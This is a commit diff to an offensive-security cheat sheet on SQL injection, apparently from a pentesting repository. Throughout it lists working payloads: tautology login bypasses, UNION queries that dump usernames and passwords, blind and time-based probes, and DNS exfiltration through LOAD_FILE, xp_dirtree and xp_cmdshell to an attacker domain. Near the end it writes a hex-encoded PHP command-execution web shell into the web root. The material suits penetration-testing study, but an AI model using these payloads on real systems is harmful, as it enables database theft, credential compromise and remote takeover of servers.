whx
/
killchain-compendium
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity

cleanup and some examples

This commit is contained in:
gurkenhabicht 2026-05-24 21:29:16 +02:00
parent 808ba8eed5
commit 9fe3c7f7cc
1 changed files with 63 additions and 17 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

80
Exploits/Databases/SQL Injection.md
View File

@ -33,7 +33,7 @@ by just putting in a single quote
http://example.com/index.php?id='
```
**Incase of client side sanitization craft the URL instead of using the form!!!**
**In case of client side sanitization craft the URL instead of using the form!!!**
## In-Band SQLi
@ -42,8 +42,10 @@ Terminate the string of the SQL command via `'` and resolve via tautology like
and delivers a response containing DB content
```sql
SELECT * FROM users WHERE username = admin AND password := ' and 1=1 -- -
SELECT * FROM users WHERE username = admin AND password := ' or 1=1 --+
SELECT * FROM users WHERE username = admin AND password = '' or 1=1; -- -
SELECT * FROM users WHERE username = admin AND password = '' and 1=1 -- -
SELECT * FROM users WHERE username = admin AND password = '' or 1=1 --+
SELECT * FROM users WHERE username = admin AND password = "" or 1=1; --+
```
There are further methods of SQL injection following below.
@ -63,7 +65,7 @@ id=(SELECT banner FROM v$version) # oracle
Union based injections is an incremental and cautios approach.
Start by trying to provoke errors to validate a possible injection.
* __First method__ check by order until error occurs
__First method__ check by order until error occurs
```sql
' order by 1 -- -
@ -73,7 +75,7 @@ Start by trying to provoke errors to validate a possible injection.
Check the number of columns by inserting NULL values one after another.
__Second method__ fuzzing NULL values, followed by fuzzing data types
__Second method__ fuzzing NULL values, followed by fuzzing data types
Check number of cols
@ -96,20 +98,30 @@ Check which one contains String values
Retrieve content, for cols as an example, or dump database
```sql
' UNION SELECT NULL, NULL, database(), NULL
' UNION SELECT NULL,NULL,database(),NULL,NULL from users -- - //
' UNION SELECT NULL,username,password,NULL FROM users -- - //
```
Retrieve content by union poking the count and order of columns, afterwards
extracting tables via
extracting tables via:
```sh
0 union select null, null, database()
0 union select null, null, group_concat(table_name) from information_schema.tables where table_schema = 'found_db'
0 union select null, null, group_concat(column_name) from information_schema.columns where table_name = 'found_tablename'
0 union select null, null, group_concat(username, ':', password from found_tablename
0 union select null, null, group_concat(username, ':', password SEPARATOR '<br>') from found_tablename;
```
Function `group_concat` concatenates all rows into a single string.
* `information_schema.tables` acts on every available table of a database.
* `information_schema.columns`
Option `table_schema` contains the name of the database, `table_name` the name
of the tables inside the database and `column_name` the names of the columns of
a selected table.
The examples above contain methods of retrieving table name, column names. The
last example uses the information returned to inject the correct column names
so the acutal content of them are retrieved. Further examples under [SQL
@ -120,7 +132,7 @@ Functions](#SQL-Functions)
Use SQL functions to poke the tables & cols via union.
* [source](https://medium.com/@nyomanpradipta120/sql-injection-union-attack-9c10de1a5635)
Extract tables
Extract tables
```sql
1' and 1=2 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema = database() -- -
@ -128,7 +140,7 @@ Extract tables
SQLite specifica
```sql
' UNION SELECT sql, sql FROM sqlite_master -- -
UNION SELECT sql, sql FROM sqlite_master -- -
```
```sql
@ -165,10 +177,24 @@ SELECT * FROM users WHERE username = admin AND password :=1' or 1 > 2 --+
```
Blind boolean base substring fuzzes one char at a time, by inspecting the
return value after each inserted char.
return value after each inserted char. This can be used if the response
includes some kind of boolean statement about the existence of a database or
table.
Extract database:
```sql
' UNION SELECT null,null,null where database() like 'da%';-- -
UNION SELECT null,null,null where database() LIKE '%'; -- -
```
```sql
UNION SELECT null,null,null where database() like 'da%';-- -
```
If the database name is known fuzz the tablename:
```sql
UNION SELECT null,null,null FROM information_schema.tables WHERE table_schema = 'db_name' AND table_name LIKE 'a%'; -- -
```
### Time Based
@ -177,8 +203,9 @@ Checking input blindly via sleep() function. Count the number of columns in
this way. on success, the sleep(5) function executes
```sql
' union select sleep(3), null; -- -
' SELECT * from users where id = 420; IF (69=69) WAITFOR DELAY '00:00:03' -- -
UNION SELECT sleep(3), null; -- -
UNION SELECT sleep(3),1 null; -- - one column
SELECT * FROM users WHERE id = 420; IF (69=69) WAITFOR DELAY '00:00:03' -- -
```
### Blind injection
@ -250,6 +277,21 @@ original SQLi payload.
Check if an inserted SQL query may be set instead of regular data, e.g. instead
of a name and let it be queried via a second step.
### DNS Resolution Including Exfiltrated Data
Read a file on Windows via `LOAD_FILE()` and add its content as a subdomain, so the DNS request will contain the exfiltrated data.
```sql
SELECT LOAD_FILE(CONCAT('\\\\', (SELECT database()), '.mydomain.com\\share'));
```
Another possibility of data extraction is `xp_dirtree` which triggers DNS
resolution for the target server:
```sql
EXEC master..xp_dirtree '\\mydomain.com\share';
```
### Other Communication Channels
Instead of a direct response there may be indirect results possible, like the following.
@ -257,7 +299,7 @@ Instead of a direct response there may be indirect results possible, like the fo
Write to a file via `OUTFILE`.
```sql
SELECT passwords FROM users INTO OUTFILE '/dev/shm/passwords.txt`
SELECT passwords FROM users INTO OUTFILE '/dev/shm/passwords.txt';
```
Executing shell commands for extraction through `xp_cmdshell` on MYSQL.
@ -267,6 +309,10 @@ exfiltration target.
Other exfiltration targets may be DNS or SMB servers.
```sql
EXEC xp_cmdshell 'nslookup data.mydomain.com';
```
On the attacker side start an SMB server.
```sh
@ -296,7 +342,7 @@ parameter
<cookieID>'into outfile '/var/www/html/shello.php' lines terminated by 0x3c3f706870206563686f20223c7072653e22202e2073797374656d28245f4745545b22636d64225d29202e20223c2f7072653e223b3f3e -- -
```
Insert `<?php system($_GET["cmd"]); ?>`
Insert `<?php system($_GET["cmd"]); ?>`
```sql
" Union Select 1,0x201c3c3f7068702073797374656d28245f4745545b2018636d6420195d293b203f3e201d,3,4 INTO OUTFILE '/var/www/html/shell.php' -- -
@ -317,7 +363,7 @@ Get column names through the following example.
GET /about/0 UNION all select group_concat(column_name), null,null,null,null from information_schema.columns where table_name = 'user' HTTP/1.1
```
Get rows from users by id
Get rows from users by id
```HTTP
GET /about/0 UNION all select notes, null, null, null, null from users where id = 4711 HTTP/1.1
@ -325,7 +371,7 @@ GET /about/0 UNION all select notes, null, null, null, null from users where id
## Filter Bypass
Bypass may be possible through character encodings like
Bypass may be possible through character encodings like
* Percent/URL
* Hex